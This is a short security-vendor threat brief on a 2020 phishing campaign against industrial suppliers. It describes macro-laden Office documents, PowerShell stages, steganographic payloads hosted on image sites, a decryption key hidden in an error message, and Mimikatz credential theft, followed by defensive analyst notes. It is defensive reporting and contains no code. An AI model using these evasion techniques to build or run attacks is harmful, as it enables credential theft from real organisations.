In May 2020, international equipment suppliers for the industrial sector were targeted with an attack that used unconventional techniques to evade detection, according to researchers at Kaspersky. The attacks started with an urgent phishing email being sent to victims which included malicious Microsoft Office documents with obfuscated macros. Targets were located in Germany, the UK, Italy, and Japan. If the localization of the intended victim’s operating system did not match the language used in the phishing email, the malware would not fully execute. The macros execute a PowerShell script which selects a URL that goes to the legitimate public image hosting services imgur[dot]com or imgbox[dot]com to download an image that is hiding encrypted data through the use of steganography. The decryption key for the data is hidden in an exception message associated with an error that was entered into the script on purpose. A second PowerShell script will run a third PowerShell script which is an obfuscated sample of Trojan-PSW.PowerShell.Mimikatz malware. Attackers are using the Mimikatz utility to steal the authentication data of Windows accounts stored on the victim’s computer system. After an infection is successful, the attackers could use this foothold in the supplier’s network as a pivot point later to attack the supplier’s industrial enterprise clients.
Analyst Notes
: This attack utilized many unconventional techniques to make it hard to detect and hard to analyze by researchers. By making attacks complicated this way, the attackers have a longer timetable to infect more victims before readily available detection techniques are deployed. Because the malware used steganography and downloaded the image from legitimate online resources, network monitoring would not be able to catch these infections. However, a service such as Managed Endpoint Detection and Response which is offered through Binary Defense would be able to detect the abnormal behavior on the targeted device and stop it before it has a chance to spread. Defenders could also block communications with public image hosting services if they are not needed for the organization’s operations, although that could cause unintended problems for employees attempting to view websites. As attacks with steganography continue to evolve, attackers will likely find new websites to use to download their images.
More can be read here: https://www.scmagazine.com/home/security-news/cybercrime/multilingual-malware-attacks-on-industrial-sector-suppliers-designed-to-thwart-detection/
